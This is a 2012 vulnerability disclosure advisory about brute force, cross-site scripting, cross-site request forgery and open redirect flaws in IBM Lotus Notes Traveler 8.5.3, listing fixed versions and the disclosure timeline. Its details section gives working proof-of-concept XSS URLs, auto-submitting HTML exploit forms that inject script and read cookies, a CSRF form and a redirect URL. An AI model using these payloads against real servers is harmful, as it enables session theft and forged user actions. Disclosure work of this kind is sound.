I want to warn you about Brute Force, Cross-Site Scripting, Cross-Site Request Forgery and Redirector vulnerabilities in IBM Lotus Notes Traveler. IBM are planning to release their advisory soon concerning these vulnerabilities. ------------------------- Affected products: ------------------------- Vulnerable are IBM Lotus Notes Traveler 8.5.3 and previous versions. IBM fixed the part of these vulnerabilities. XSS in ILNT.mobileconfig were fixed in version Traveler 8.5.3.2 already at 29.02.2012, and XSS and Redirector in traveler were fixed in version Traveler 8.5.3.3 Interim Fix 1 (released at 15.09.2012) and Traveler 8.5.3 Upgrade Pack 1 Interim Fix 1 (released 14.09.2012). They are not planning to fix Brute Force (because they have said nothing about it), and they are still thinking about CSRF. And IBM are still working on other vulnerabilities, about which I've informed them. ---------- Details: ---------- Attacks on XSS, CSRF and Redirector vulnerabilities will only work against users authorized at the site. Brute Force (WASC-11): http://site/servlet/traveler Cross-Site Scripting (WASC-08): Will work in different browsers (in case of Mozilla Firefox will work in versions before Firefox 3.0.9): http://site/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie) Will work in all versions of Firefox, but without access to cookies: http://site/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B Cross-Site Scripting (WASC-08): IBM Lotus Notes Traveler XSS-1.html <html> <head> <title>IBM Lotus Notes Traveler XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/servlet/traveler/ILNT.mobileconfig" method="post"> <input type="hidden" name="userId" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="action" value="getClientConfigFile"> <input type="hidden" name="cmd" value="getClientConfigFile"> </form> </body> </html> IBM Lotus Notes Traveler XSS-2.html <html> <head> <title>IBM Lotus Notes Traveler XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/servlet/traveler/ILNT.mobileconfig" method="post"> <input type="hidden" name="address" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="action" value="getClientConfigFile"> <input type="hidden" name="cmd" value="getClientConfigFile"> </form> </body> </html> Cross-Site Request Forgery (WASC-09): IBM Lotus Notes Traveler CSRF.html <html> <head> <title>IBM Lotus Notes Traveler CSRF exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/servlet/traveler" method="post"> <input type="hidden" name="problemText" value="test"> <input type="hidden" name="action" value="getReportProblem"> <input type="hidden" name="cmd" value="upload"> </form> </body> </html> Redirector (URL Redirector Abuse) (WASC-38): http://site/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua ------------ Timeline: ------------ Full timeline read in the first advisory (http://securityvulns.ru/docs28474.html). - During 16.05-20.05 I've wrote announcements about multiple vulnerabilities in IBM software at my site. - During 16.05-20.05 I've wrote five advisories via contact form at IBM site. - At 31.05 I've resend five advisories to IBM PSIRT, which they received and said they would send them to the developers (of Lotus products). - During June-August I had additional conversation with them concerning Lotus Notes Traveler. - At 26.09 IBM informed me about their fixes for IBM Lotus Notes Traveler. - At 28.09.2012 I've disclosed these vulnerabilities (third advisory) at my site (http://websecurity.com.ua/5843/).
